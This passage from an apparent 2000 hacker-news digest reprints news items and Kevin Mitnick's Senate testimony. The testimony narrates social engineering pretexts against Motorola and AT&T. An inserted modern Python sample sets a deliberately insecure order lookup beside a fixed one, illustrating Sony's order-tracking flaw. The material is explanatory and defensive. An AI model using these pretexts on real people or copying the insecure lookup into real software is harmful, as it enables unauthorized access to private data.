      priority than securing old customers. When it comes to
      provisioning new customers, hosting providers often
      become neglectful after the honeymoon period is over. 
   
      If an Internet company is outsourcing its web hosting to
      a service provider, a member of the executive
      management team needs to be held responsible for
      making sure its service provider has taken due security
      precautions. If your service provider claims your site is
      secure, they should not have any qualms about their
      customers performing audits on them.
      
      <SNIP>
      
      <Follow link for continuation (graphs etc) -Ed >
                       

      
      @HWA
      
107.0 HNN:Mar 2nd:Mitnick to Testify at Senate Today
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by macki 
      
      Kevin Mitnick will be in Washington DC today to testify before
      the Senate Governmental Affairs Committee as they ponder the security
      of the federal government's information systems. It's ironic that the
      same government that kept him locked for so long is now interested
      in hearing his opinions. The hearing is scheduled for Thursday at 10 am,
      Room D-342 in the Dirksen Senate Office building. (It will be
      interesting to see what Kevin has to say after four years in jail.)
      
      2600 - Written Testimony           
      http://www.2600.com/news/2000/0302-test.html
      
      Senate Press Release
      http://www.senate.gov/~gov_affairs/023200_press.htm      
      
      Security Focus
      http://www.securityfocus.com/data/news/klp022900.html
      
      
      2600 - Testimony
      
      KEVIN MITNICK'S WRITTEN SENATE TESTIMONY 

     03/02/00 

     Honorable Chairperson Thompson, Distinguished Senators, and Members of the 
     Committee: 

     My name is Kevin Mitnick. I appear before you today to discuss your efforts 
     to create legislation that will ensure the future security and reliability 
     of information systems owned and operated by, or on behalf of, the federal 
     government. 

     I am primarily self-taught. My hobby as an adolescent consisted of studying 
     methods, tactics, and strategies used to circumvent computer security, and 
     to learn more about how computer systems and telecommunication systems work. 

     In 1985 I graduated cum laude in Computer Systems and Programming from a 
     technical college in Los Angeles, California, and went on to successfully 
     complete a post-graduate project in designing enhanced security 
     applications that ran on top of a computer's operating system. That 
     post-graduate project may have been one of the earliest examples of "hire 
     the hacker:" the school's administrators realized I was hacking into their 
     computers in ways that they couldn't prevent, and so they asked me to 
     design security enhancements that would stop others' unauthorized access. 

     I have 20 years experience circumventing information security measures, and 
     can report that I have successfully compromised all systems that I targeted 
     for unauthorized access save one. I have two years experience as a private 
     investigator, and my responsibilities included locating people and their 
     assets using social engineering techniques. 

     My experience and success at accessing and obtaining information from 
     computer systems first drew national attention when I obtained user manuals 
     for the COSMOS computer systems (Computer Systems for Mainframe Operations) 
     used by Pacific Bell. 

     Ten years later the novel "Cyberpunk" was published in 1991, which 
     purported to be a "true" accounting of my actions that resulted in my arrest 
     on federal charges in 1988. One of the authors of that novel went on to 
     write similarly fictionalized "reports" about me for the New York Times, 
     including a cover story that appeared July 4, 1994. That largely fictitious 
     story labeled me, without reason, justification, or proof, as the "world's 
     most wanted cybercriminal." Subsequent media reports distorted that claim 
     into the false claim that I was the first hacker on the FBI's "Ten Most 
     Wanted" list. That false exaggeration was most recently repeated during my 
     appearance on CNN's Burden of Proof program on February 10, 2000. Michael 
     White of the Associated Press researched this issue with the FBI, and FBI 
     representatives denied ever including me on their "Ten Most Wanted" list. 

      I have gained unauthorized access to computer systems at some of the 
      largest corporations on the planet, and have successfully penetrated some 
      of the most resilient computer systems ever developed. I have used both 
      technical and non-technical means to obtain the source code to various 
      operating systems and telecommunications devices to study their 
      vulnerabilities and their inner workings. 

      After my arrest in 1995, I spent years as a pretrial detainee without 
      benefit of bail, a bail hearing, and without the ability to see the 
      evidence against me, combined circumstances which are unprecedented in 
      U.S. history according to the research of my defense team. In March of 
      1999 I pled guilty to wire fraud and computer fraud. I was sentenced to 68 
      months in federal prison with 3 years supervised release. 

      The supervised release restrictions imposed on me are the most restrictive       
      conditions ever imposed on an individual in U.S. federal court, again 
      according to the research of my defense team. The conditions of supervised 
      release include, but are not limited to, a complete prohibition on the 
      possession or use, for any purpose, of the following: cell phones, 
      computers, any computer software programs, computer peripherals or support 
      equipment, personal information assistants, modems, anything capable of 
      accessing computer networks, and any other electronic equipment presently 
      available or new technology that becomes available that can be converted 
      to, or has as its function, the ability to act as a computer system or to 
      access a computer system, computer network, or telecommunications network. 

      In addition to these extraordinary conditions, I am prohibited from acting 
      as a consultant or advisor to individuals or groups engaged in any 
      computer-related activity. I am also prohibited from accessing computers, 
      computer networks, or other forms of wireless communications myself or 
      through third parties. 

      I was released from federal prison on January 21, 2000, just 6 weeks ago. 
      I served 59 months and 7 days, after earning 180 days of time off 
      for good behavior. I am permitted to own a land line telephone. 

      Computer Systems and Their Vulnerabilities 

      
      The goal of information security is to protect the integrity, 
      confidentiality, availability and access control to the information. 
      Secure information is protected against tampering, disclosure, and 
      sabotage. The practice of information security reduces the risk associated 
      with loss of trust in the integrity of the information. 

      Information security is comprised of four primary topics: physical 
      security, network security, computer systems security, and personnel 
      security. Each of these four topics deserves a complete book, if not 
      several books, to fully document them. My presentation today is intended 
      to provide a brief overview of these topics, and to present my 
      recommendations for the manner in which the Committee may create effective 
      legislation. 

      1. Physical Security 

      1.1 Uncontrolled physical access to computer systems and computer networks       
      dramatically increases the likelihood that the system can and will suffer 
      unauthorized access. 

      1.1.1 Hardware Security

      Computers may be locked in rooms or buildings, with guards, security
      cameras, and cypher-controlled doors. The 
      greatest risk to information security in apparently secure hardware 
      environments is represented by employees, or impostors, who appear to 
      possess authorization to the secured space. 

      1.1.2 Data Security

      Many government agencies require formal backup procedures to ensure
      against data loss. Equally stringent 
      requirements must be in place to ensure the integrity and security of 
      those backup files. Intruders who cannot gain access to secure data but 
      who obtain unauthorized access to data backups successfully compromise any 
      security measures that may be in place, and with much less risk of 
      detection. 

      2. Network Security 

      2.1 Stand-alone computers are less vulnerable than computers that are 
      connected to any network of any kind. Computers connected to 
      networks typically offer a higher incidence of misconfiguration, or 
      inappropriately enabled services, than computers that are not connected to 
      any network. The hierarchy of network "insecurity" is as follows:

      -- Stand-alone computer - least vulnerable
      -- Computer connected to a LAN, or local area network - more vulnerable
      -- Computer and a LAN accessible via dial-up - even more vulnerable
      -- Computer and LAN connected to internet - most vulnerable of all 

     2.1.1 Unencrypted Network Communications

     Unencrypted network communications permit anyone with physical access to
     the network to use software to monitor all information traveling over the
     network, even though it's intended for 
     someone else. Once a network tap is installed, intruders can monitor all 
     network traffic, and install software that enables them to capture, or 
     "sniff," passwords from network transmissions. 

     2.1.2 Dial-in Access

     Dial-in access increases vulnerabilities by opening up 
     an access point to anyone who can access ordinary telephone lines. Off site 
     access increases the risk of intruders gaining access to the network by 
     increasing the accessibility of the network and the remote computer. 

     3. Computer Systems Security 

     3.1 Computer systems that are not connected to any network present the most 
     secure computing environment possible. However, even a brief review of 
     standalone computer systems reveals many ways they may be compromised. 

     3.1.1 Operating Systems

     The operating systems control the functions of the 
     computer: how information is stored, how memory is managed, and how 
     information is displayed -- it's the master program of the machine. At its 
     core, the operating system is a group of discrete software programs that 
     have been assembled into a larger program containing millions of lines of 
     code. Large modern day operating systems cannot be thoroughly tested for 
     security anomalies, or "holes," which represent opportunities for 
     unauthorized access. 

     3.1.2 Rogue Software Programs

     "Rogue" software applications can be 
     installed surreptitiously, or with the unwitting help of another. These 
     programs can install a "back door", which usually consists of programming 
     instructions that disable obscure security settings in an operating system 
     and that enable future access without detection; some back door programs 
     even log the passwords used to gain access to the compromised system or 
     systems for future use by the intruder. 

      3.1.3 Ineffective Passwords

      Computer users often choose passwords that are 
      in the dictionary, or that have personal relevance, and are quite 
      predictable. Static, or unchanging, passwords represent another easy 
      method for breaching a computer system -- once a password is compromised, 
      the user and the system administrators have no way of knowing the password 
      is known to an intruder. Dynamic passwords, or non-dictionary passwords 
      are problematic for many users, who write them down and keep them near 
      their computers for easy access -- their own, or anyone who breaches 
      physical security of the computer installation. 

      3.1.4 Uninstalled Software Updates

      Out-of-date system software containing known security problems presents
      an easy target to an intruder. 
      Systems administrators cannot keep systems updated as a result of work 
      overload, competing priorities, or ignorance. The weaknesses of systems 
      are publicized, and out-of-date systems typically offer well-known 
      vulnerabilities for easy access. 

      3.1.5 Default Installations

      Default installations of some operating systems disable many of the
      built-in security features in a given 
      operating system. In addition, system administrators unintentionally 
      misconfigure systems, or include unnecessary services that may lead to 
      unauthorized access. Again, these weaknesses are widely publicized within 
      the computing community, and default or misconfigured installations 
      present an easy target. 

      4. Personnel Security 

      4.1 The most complex element in information security is the people who use 
      the systems in which the information resides. Weaknesses in 
      personnel security negate the effort and cost of the other three types of 
      security: physical, network, and computer system security. 

      4.1.1 Social Engineering

      Social engineering, or "gagging," is defined as gaining intelligence
      through deception. Employees are trained to be 
      helpful, and to do what they are told in the workplace. The skilled social 
      engineer will use these traits to his or her advantage as they seek to 
      gain information that will enable them to achieve their objectives. 

      4.1.2 Email Attachments

      Email attachments may be sent with covert code embedded within. Upon
      receiving the email, most people will launch 
      the attachment, which can lower the security settings on the target 
      machine without the user's knowledge. The likelihood of a successful 
      installation using this method can be increased by following up the email 
      submittal with a telephone call to prompt the person to open the 
      attachment. 

      Information Security Exploits 

      
      Information security exploits are the methods, tactics, and strategies 
      used to breach the integrity, confidentiality, availability or access 
      control of information. Discovery of compromised information security has 
      several consequences, the most important of which is the decline in the 
      level of trust associated with the compromised information and systems 
      that contain that information. Examples of typical security exploits 
      follow. 

      5. Physical Security Exploits 

      5.1 Data Backup Exploit

      Using deception or sheer bravado, the intruder can walk into the
      off site backup storage facility, and ask for the
      physical data backup by pretending to be from a certain agency. The 
      intruder can claim that particular backup is necessary to perform a data 
      restoration. Once an intruder has physical possession of the data, the 
      intruder can work with the data as though he possessed superuser, or 
      system administrator, privileges. 

      5.2 Physical Access Exploit

      If an intruder gains physical access to a computer and is able to
      reboot it, the intruder can gain complete
      control of the system and bypass all security measures. An extremely 
      powerful exploit, but one that exposes the intruder to great personal risk 
      because they're physically present on the premises. 

      5.3 Network Physical Access Exploit

      Physical access to a network enables an intruder to install a tap on
      the network cable, which can be used
      to eavesdrop on all network traffic. Eavesdropping enables the intruder to 
      capture passwords as they travel over the network, which will enable full 
      access to the machines whose passwords are compromised. 

      6. Network Security Exploits 

      6.1 Network software exists that probes computers for weaknesses. Once one
      system's weaknesses are revealed and the system is compromised, the intruder
      can install software (called "sniffer" software) that compromises all
      systems on the network. Following that, an intruder can install software 
      that logs the passwords used to access that compromised machine. Users 
      routinely use the same or similar passwords across multiple machines; 
      thus, once one password for one machine is obtained, then multiple 
      machines can be compromised (see "Personnel Security Exploits"). 

      7. Computer System Exploits 

      7.1 Vulnerabilities in programs (e.g., the UNIX program sendmail) can be       
      exploited to gain remote access to the target computer. Many system 
      programs contain bugs that enable the intruder to trick the software into 
      behaving in a way other than that which is intended in order to gain 
      unauthorized access rights, even though the application is a part of the 
      operating system of the computer. 

      7.2 A misconfigured installation on a computer in operation at the Raleigh
      News and Observer, a paper in Raleigh, North Carolina, demonstrates
      the problematic aspect of system misconfiguration. Using the UNIX program
      "Finger," which enables one to identify the users that are currently
      logged into a computer system, I created a user name on the computer
      system I controlled. The user name I assigned myself matched exactly the
      user name that existed on the target host. The misconfigured system was
      set to "trust" any computer on the network, which left the entire network
      open for unauthorized access.

      8. Personnel Security Exploits 

      8.1 Social Engineering -- involves tricking or persuading people to reveal       
      information or to take certain actions at the behest of the intruder. My 
      work as a private investigator relied heavily on my skills in social 
      engineering. 

      In my successful efforts to social engineer my way into Motorola, I used a       
      three-level social engineering attack to bypass the information security 
      measures then in use. First I was able to convince Motorola Operations 
      employees to provide me, on repeated occasions, the pass code on their 
      security access device, as well as the static PIN. The reason this was so 
      extraordinary is that the pass code on their access device changed every 
      60 seconds: every time I wanted to gain unauthorized access, I had to call 
      the Operations Center and ask for the password in effect for that minute. 

      The second level involved convincing the employees to enable an account
      for my use on one of their machines, and the third level involved
      convincing one of the engineers who was already entitled to access one of 
      the computers to give me his password. I overcame that engineer's vigorous 
      reluctance to provide the password by convincing him that I was a Motorola 
      employee, and that I was looking at a form that documented the password 
      that he used to access his personal workstation on Motorola's network -- 
      despite the fact that he never filled out any such form! Once I gained 
      access to that machine, I obtained Telnet access to the target machine, 
      access which I had sought all along. 

      8.2 Voice Mail and Fax Exploit

      This exploit relies on convincing an employee at a large company to
      enable a voice mailbox: the intruder
      would call the people who administer the voice mailboxes for the target 
      company and request a mailbox. The pretext would be that the intruder 
      works for a different division, and would like to retrieve messages 
      without making a toll call.

      Once the intruder has access to the voice mail system, the intruder would
      call the receptionist, represent himself as an employee of the
      company, and ask that they take messages for him; last but not least, the 
      intruder would request the fax number and ask that incoming faxes be held 
      for pickup. This sets the stage for the call to the target division of the 
      company. 

      At this point, the intruder would call the target division to initiate the
      fax exploit with the goal of obtaining the targeted confidential
      company information. During that call the intruder would identify himself 
      as an employee of the division whose voice mail and fax systems have just 
      been compromised, he would cite the voice mail box in support of his 
      identity, and would social engineer the target employee into faxing the 
      target information to the compromised fax number located at one of their 
      other offices. 

      Now the intruder would call the receptionist, tell the receptionist that
      he's in a business meeting, and ask that the receptionist fax the
      confidential material "to the hotel." The intruder picks up the fax 
      containing confidential information at the secondary fax, which cannot be 
      traced back to either the intruder or the targeted company. 

      I used this exploit to successfully compromise ATT's protected network
      access points routinely. ATT had learned that a system had been
      compromised by unauthorized entry at a central network access point called 
      "DataKit." They imposed network access passwords on all DataKits to 
      inhibit unauthorized access. I contacted one of the manager's secretaries 
      and used the Fax Exploit to convince the secretary to fax me the password 
      that enabled access to a DataKit that controlled dial-up access to ATT's 
      worldwide computer network. 

      9. Recommendations

      The Voice Mail and Fax Exploit demonstrates the most
      important element in my testimony today: that verification mechanisms are 
      the weak link in information security, and voice mail and fax are the 
      tools used to verify the authenticity of the credentials presented by 
      someone seeking physical, network, or computer systems access. 

      The methods that will most effectively minimize the ability of intruders
      to compromise information security are comprehensive user training
      and education. Enacting policies and procedures simply won't suffice. Even 
      with oversight the policies and procedures may not be effective: my access 
      to Motorola, Nokia, ATT, Sun depended upon the willingness of people to 
      bypass policies and procedures that were in place for years before I 
      compromised them successfully. The corporate security measures that I 
      breached were created by some of the best and brightest in the business, 
      some of whom may even have been consulted by the committee as you drafted 
      your legislation, Senate Bill S1993. 

      S1993 represents a good first step toward the goal of increasing
      information security on government computer systems. I have several
      recommendations that I hope will increase the effectiveness of your bill. 

      1. Each agency perform a thorough risk assessment of the assets they want
      to protect.

      2. Perform a cost-benefit analysis to determine whether the price to
      protect those systems represents real value.

     3. Implement policies, procedures, standards and guidelines consistent with 
     the risk assessment and cost benefit analyses. Employee training to 
     recognize sophisticated social engineering attacks is of paramount 
     importance. 

     4. After implementing the policies, procedures, standards and guidelines, 
     create an audit and oversight program that measures compliance throughout 
     the affected government agencies. The frequency of those audits ought to be 
     determined consistent with the mission of a particular agency: the more 
     valuable the data, the more frequent the audit process. 

     5. Create a numeric "trust ranking" that quantifies and summarizes the 
     results of the audit and oversight programs described above. The numeric 
     "trust ranking" would provide at-a-glance ranking -- a report card, if you 
     will -- of the characteristics that comprise the four major categories 
     defined above: physical, network, computer systems, and personnel. 

     6. Effective audit procedures -- implemented from the top down -- must be 
     part of an appropriate system of rewards and consequences in order to 
     motivate system administrators, personnel managers, and government 
     employees to maintain effective information security consistent with the 
     goals of this committee. 

     Conclusion 

     Obviously a brief presentation such as the one I've made today cannot 
     convey adequately the measures needed to implement effective information 
     security measures. I'm happy to answer any questions that may have been left
     unanswered for any members of the Committee.
     
     -=-
     
     Senate Press Release:
     
     
     
      FEBRUARY 23, 2000 
      THOMPSON/LIEBERMAN ANNOUNCE HEARING TO BETTER PROTECT GOVERNMENT COMPUTERS 
      FROM CYBERATTACK

      Washington, DC -- Senate Governmental Affairs Chairman Fred Thompson
      (R-TN) and Ranking Member Joseph I. Lieberman (D-CT) announced today that
      the Committee will hold a March 2 hearing to discuss the security of
      the federal government's information systems.

      "We know that federal agencies continue to use a band-aid approach to 
      computer security rather than addressing the systemic problems which make 
      government systems vulnerable to repeated computer attacks," said
      Thompson. "Hopefully, the recent breaches of security at the various 
      dot.com companies is the wake-up call needed to focus attention on the 
      security of government computer systems. This Committee has been looking 
      at the federal government's use of computers since the passage of the 
      Brooks Act in 1965. Since I became chairman of the Committee in 1997, we 
      have heard from security experts, senior government officials and the
      General Accounting Office about the persistent security risks associated
      with the government's information holdings."

      Senator Lieberman added, "The simple and frightening fact is, government 
      computer systems are vulnerable to the kinds of attacks e-businesses have 
      been suffering lately - and worse. Lax government computer security
      threatens our national security, our transportation and emergency 
      services, our banking and finance. And if this weren't cataclysmic enough, 
      it also leaves the most personal information of all our taxpayers - our 
      veterans, our elderly, our sick - vulnerable to exposure and exploitation. 
      Scores of government systems have already been hacked although 
      fortunately, none of the intrusions to date has been damaging. But let's 
      face it: it's only a matter of time."

      The March 2 hearing will explore the human side of computer security as it 
      relates to successfully implementing a sound government computer security 
      program.

      On November 19, 1999, Thompson and Lieberman introduced S. 1993, the 
      Government Information Security Act that provides a framework for how the 
      government could make its systems more secure while simultaneously
      providing continuous, uninterrupted services to the public. The 
      legislation is based on Governmental Affairs Committee hearings and a GAO 
      best practices study.
      
      -=-
      
      Security Focus:
      
      Mr. Mitnick Goes to Washington 

      February 29, 12:44 PM PST By Kevin Poulsen 

      WASHINGTON (SecurityFocus.com News) - A little over one month after his 
      release from prison, famed hacker Kevin Mitnick will testify before the 
      Senate Committee on Governmental Affairs on Thursday morning, in a hearing 
      planned to address the security of the federal government's computer
      networks. 

      Committee chairman Fred Thompson (R-TN) and ranking member Joseph 
      Lieberman (D-CT) announced the hearing last Wednesday - one of a flurry of 
      congressional hearings to follow this month's crippling denial of service 
      attacks on various high-traffic Internet sites. The witness list was
      made public this afternoon, and also includes James Adams from computer 
      security company iDefense, Cisco's Ken Watson, and two government experts. 

      Mitnick, arguably the world's most famous recreational computer intruder,
      pleaded guilty in March of 1999 to seven felonies, and admitted to cracking
      computers belonging to cell phone companies and computer makers, including
      Motorola (NYSE: MOT), Fujitsu and Sun Microsystems (Nasdaq: SUNW). He
      was freed January 21st, after nearly five years behind bars.

      In a public statement following his release, Mitnick sharply criticized 
      federal prosecutors and the media for their handling of his case. 
      According to Greg Vinson, one of Mitnick's attorneys, Thursday's testimony 
      will have a different focus. 

      "He's testifying about his experience with system vulnerabilities and ways 
      to make government's computer systems more secure," said Vinson. 


      
      @HWA
      
108.0 HNN:Mar 2nd:Utah Passes Net Filtering Law
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Odin
      
      Late last month voters in the general primary of Michigan defeated a
      ballot initiative to prevent Internet filtering in libraries. Now in
      Utah, the State Senate has voted 28-0 to withhold funding from state
      libraries that do not implement internet filters. So, despite numerous
      other states voting against this measure, it is still being imposed on
      the citizens of Utah. (Are the State Senators of Utah accurately
      representing their constituents?)
      
      USAToday
      http://www.usatoday.com/life/cyber/tech/cth467.htm
      
      02/29/00- Updated 02:05 PM ET

                  

      Utah eyes Net filters for libraries

      SALT LAKE CITY (AP) - The Utah Senate gave final legislative approval
      Monday to a bill that would withhold state funding from libraries that fail to
      shield Web sites featuring obscene material from children younger than 18. 

      The Senate vote was 28-0. 

      A number of Utah libraries already use filtering programs to shield
      minors from pornography.

      Also Monday, the Utah House voted to take Playboy out of prisons.

      The House gave final legislative approval to a measure banning from prisons,
      jails and juvenile detention centers any magazine, book, pamphlet,
      newsletter, stationery, greeting card or video that ''features nudity.'' 

      The bills now go to Gov. Mike Leavitt, who has not announced his position
      on either piece of legislation.     
      
      
      @HWA
      
109.0 HNN:Mar 2nd:Restaurants Gather Data on Customers
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Odin
      
      Forget credit card companies, or web advertisers; the real privacy
      invaders may actually be restaurants. Restaurants that keep track of
      what you eat, how much of it, what you like, how much you tip, how much
      wine you drink, who you come in with, etc. With cameras mounted over
      your table, gathering personal data has become extremely easy. (Seems
      like everyone wants a database these days, now who is going to be the
      first to put them all together?)
      
      NY Times
      http://www.nytimes.com/library/dining/030100video-privacy.html
      (Pay to play...)
      
      
      @HWA 
      
       
      
110.0 HNN:Mar 2nd:Expedia Takes Charge for Fraud
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Online_Temped 
      
      Expedia, the online travel affiliate of Microsoft, said on Wednesday
      that it will record a fiscal third quarter charge of $4 to $6 million.
      The charge is to cover the cost of fraudulent transactions on its Web
      site. (And who will pay for this fraud? The consumer of course in the
      form of higher prices.)
      
      ZD Net UK
      http://www.zdnet.co.uk/news/2000/8/ns-13772.html
      
      Expedia takes on fraudulent Web charges
      
       Wed, 01 Mar 2000 14:04:54 GMT
       Reuters
      
      
      Online transactions are dealt another blow with Expedia
      announcement 
      
      Expedia, the online travel affiliate of Microsoft, said on
      Wednesday that it will record a fiscal third quarter charge of $4 to
      $6m (2 to 3m) to cover the cost of fraudulent transactions on its
      Web site. 
      
      The company said stolen credit cards were used to book travel
      reservations through the site (www.expedia.com). However they
      said the cards weren't stolen from the site and its customers were
      not affected. 
      
      "The security of the Expedia.com site and its customer information
      has not been compromised," the company said in a statement. 
      
      The recent theft of credit card numbers from retail Web site CD
      Universe and RealNames, which sells simplified Internet address
      services, has exacerbated concerns about the safety of doing
      business over the Web. Concerns intensified after attacks by
      suspected computer hackers on a number of major Web sites,
      including Yahoo!, Amazon.com and eBay. 
      
      The Expedia reserve represents the company's estimate of
      unreserved fraudulent activity to date, and is less than one half of
      one percent of travel tickets sold, the company said. Gross
      bookings to date on the Expedia.com Web site total more than
      $1bn (62m). 
      
      Expedia shares closed at 20 on Tuesday on the Nasdaq stock
      market. 
      
      
       
      @HWA
       
      
111.0 HNN:Mar 2nd:CD Universe Attempts to Recover From Database Theft
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Evil Wench 
      
      Almost two months after having most of its customers' credit card
      information posted to the internet, and with the perpetrator Maxim still
      at large, CD Universe is attempting to rebuild its business. Now
      claiming one of the most secure sites on the net, CD Universe is hoping
      that their customers and investors return.
      
      Nando Times
      http://www.nandotimes.com/technology/story/body/0,1634,500175233-500227783-501098807-0,00.html
      (404)
      
       
      @HWA
      
112.0 HNN:Mar 2nd:Sony Bungles Personal Info On Web
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by ikegami 
      
      According to Japan's Asahi News, PlayStation Dot Com Japan (owned by
      Sony Computer Entertainment) mishandled their customer database.
      PlayStation Dot Com Japan took online orders for the new PlayStation2.
      According to the report, users only needed to enter a customer number in
      the tracking system home page in order to review or change their order.
      By entering a different number, anyone could browse others' personal
      information. PlayStation Dot Com Japan is currently checking to see if
      any information was actually compromised. The system was designed by IBM
      Japan.
      
      Asahi News - Japanese
      http://www.asahi.com/0302/news/national02032.html
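
The flaw described in the report, sketched as an added example (not Sony's or IBM Japan's code, which the report does not show): a lookup keyed only on the customer number, beside a form that takes the record from the authenticated session. All names, records and the `password_ok` stand-in are constructed for illustration.

```python
import secrets

# Constructed sample records; names and numbers are invented for illustration.
ORDERS = {
    100001: {"name": "A. Sato", "address": "1-2-3 Example-cho", "item": "console"},
    100002: {"name": "B. Suzuki", "address": "4-5-6 Example-cho", "item": "console"},
    100003: {"name": "C. Tanaka", "address": "7-8-9 Example-cho", "item": "console"},
}


def track_order_vulnerable(customer_number):
    """The pattern the report describes: the number alone selects the record."""
    return ORDERS.get(customer_number)


class OrderTracker:
    """Hardened form: the record is chosen by the authenticated session, and a
    number supplied by the caller is only ever checked against that session."""

    def __init__(self, orders):
        self._orders = orders
        self._sessions = {}   # random session token -> customer number
        self.denied = []      # (session owner, requested number), for monitoring

    def login(self, customer_number, password_ok):
        # password_ok stands in for a real credential check (assumption).
        if not password_ok or customer_number not in self._orders:
            return None
        token = secrets.token_urlsafe(32)   # unguessable, unlike the order number
        self._sessions[token] = customer_number
        return token

    def track_order(self, token, customer_number):
        owner = self._sessions.get(token)
        if owner is None:
            raise PermissionError("not authenticated")
        if customer_number != owner:
            # Record cross-account requests so enumeration shows up in review.
            self.denied.append((owner, customer_number))
            raise PermissionError("order belongs to another customer")
        return self._orders[owner]


def records_exposed(lookup, numbers):
    """Count how many records one caller obtains by walking a range of numbers."""
    seen = 0
    for n in numbers:
        try:
            if lookup(n) is not None:
                seen += 1
        except PermissionError:
            pass
    return seen


if __name__ == "__main__":
    tracker = OrderTracker(ORDERS)
    token = tracker.login(100001, password_ok=True)
    span = range(100000, 100010)
    print("vulnerable lookup exposes:", records_exposed(track_order_vulnerable, span))
    print("hardened lookup exposes:",
          records_exposed(lambda n: tracker.track_order(token, n), span))
    print("denied requests logged:", len(tracker.denied))
```

The `denied` list is the part worth wiring into monitoring: a single session asking for many numbers it does not own is the signature of someone walking the range.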
      
      @HWA 
      
       
      
113.0 HNN:Mar 2nd:CIA Report on Deutch Posted to Net
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by marka 
      
      The Federation of American Scientists has released a copy of the CIA's
      report "Central Intelligence Agency Inspector General, Report of
      Investigation - Improper Handling of Classified Information By John M.
      Deutch". The report has a "For Official Use Only" handling caveat on it,
      but the great folks at FAS (who know the Freedom of Information Act way
      better than a lot of organizations) were able to score a copy and are
      graciously posting it for all the world to see.
      
      Federation of American Scientists
      Report of Investigation
      http://www.fas.org
      
      @HWA
      
114.0 HNN:Mar 2nd:Brazil Authorities Try to Combat Online Criminals
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Apocalyse Dow 
      
      With limited resources and weak laws, Brazilian authorities have had a
      hard time tracking down and arresting cyber criminals. With intrusions
      into Brazilian Government web sites almost routine, lawmakers are looking
      to pass stricter laws. (Hmmm, same song, different country.)
      
      CNN
      http://www.cnn.com/2000/TECH/computing/03/01/brazil.hackers.reut/index.html
      
      Brazil's Net spawns pirates and prodigies
      
      March 1, 2000 
      Web posted at: 3:35 PM EST (2035 GMT) 
      
      
      
      By Shasta Darlington 
      
      SAO PAULO (Reuters) -- While Edgar Nogueira's schoolmates in Brazil
      launch attacks on NASA's and top model Claudia Schiffer's sites, the
      17-year-old Internet entrepreneur plots his company's debut on stock
      exchanges. 
      
      The Rio de Janeiro high school student designed his own search engine
      Aonde at the tender age of 14 and has since signed up big-name advertisers
      and lured potential investors to the company now valued at $5.6 million. 
      
      "There are some who want to build and some who want to destroy,"
      Nogueira said from his parents' home -- which doubles as an Internet office
      -- on Brazil's famous Copacabana beach. 
      
      And Brazil is an ideal place to try both. 
      
      The country's nascent Internet market is one of the fastest growing in
      the world, fuelling hundreds of start-ups and attracting as many
      investors on the lookout for the next Yahoo! or Amazon.com.

      But the complete lack of laws regulating the still-green industry has
      also made it a hacker haven.
      
      In the first half of February, Brazilian cyber pirates attacked at least 17
      international sites including government Web pages from the United States to
      Peru, the Federal Police said. 
      
      Dr. Delete and Inferno
      
      The group Inferno.com.br scrawled this graffiti message on U.S. space
      agency NASA's home page: "We don't see much difference between your
      security system and that of the Brazilian government. You get the picture?" 
      
      And while Brazil's Dr. Delete invaded Claudia Schiffer's virtual address,
      dozens of other Brazilian vandals left scathing comments about President
      Fernando Henrique Cardoso throughout the Web. 
      
      In Peru, Brazilian hackers defaced with offensive messages a site where
      April's presidential vote is going to be posted, forcing the government to
      temporarily shut the page down. 
      
      Under Brazilian law, hackers can only be punished if they also happen to
      steal, damage property or violate privacy, and limited resources have been
      set aside to investigate computer crimes. 
      
      Ironically, the only government agency prepared to process Internet outlaws,
      the Federal Police's Department of Computer Crimes, has itself had its Web
      site defaced, according to local press. 
      
      "The party is just starting," invaders wrote on the department's Web site at
      the end of last year. 
      
      The government is scrambling to create anti-hacker legislation to control the
      cyber raids but some investors are hoping the Internet itself will convert
      some outlaws with its promise of big profits. 
      
      "If they were to put all that vice used to overcome systems into producing
      things you could have a huge intelligence bank," said Alexandre Marcel, an
      investor at Estrategia brokerage and adviser for Nogueira's Aonde site. 
      
      The second round
      
      The opportunity for growth and innovation in Brazil is big, investors say.
      Internet use is growing at over 50 percent a year, but it has still only reached
      a fraction of the country's 165 million people. 
      
      International heavyweights like Spain's Terra Networks and New
      York-based Starmedia gobbled up local Internet upstarts last year, creating
      Brazil's first generation of cyber millionaires. 
      
      The second round of buying has already started in 2000. A subsidiary of
      Portugal Telecom bought major Brazilian Internet provider Zip.net for $415
      million earlier this month and other companies and specialized funds are on
      the prowl for fledgling firms with fresh ideas. 
      
      Brazil's GP Investimentos fund, owned by renowned investment banking
      aces, has been one of the biggest spenders on Internet innovation, snapping
      up upstarts like WebMotors online car seller, created by a twenty-something
      car specialist who decided to experiment on the Web. 
      
      In Brazil's northeast, a handful of computer students are leaping from the
      classroom to the boardroom as graduate theses like Brazilian search engine
      and media network Radix turn into Internet success stories with the help of a
      little financing. 
      
      At the same time, hundreds of young wanna-be-entrepreneurs like Nogueira
      are building sites at break-neck speed in hopes of catching the Latin Internet
      wave. 
      
      "I've had to turn down at least 20 projects so I can focus on making Aonde
      grow," Estrategia's Marcel said. 
      
      From the garage to the stock market
      
      Aonde started out as more of a hobby than a business but Brazilians flocked
      to the site in search of country-specific Portuguese language information. The
      company, which means "Where to" in Portuguese, is now one of the four
      biggest Brazilian search engines. 
      
      Nogueira's lunch money has skyrocketed as a result. But the baseball-cap
      wearing whiz kid says he spends only a few dollars a month on movies and
      outings with friends. 
      
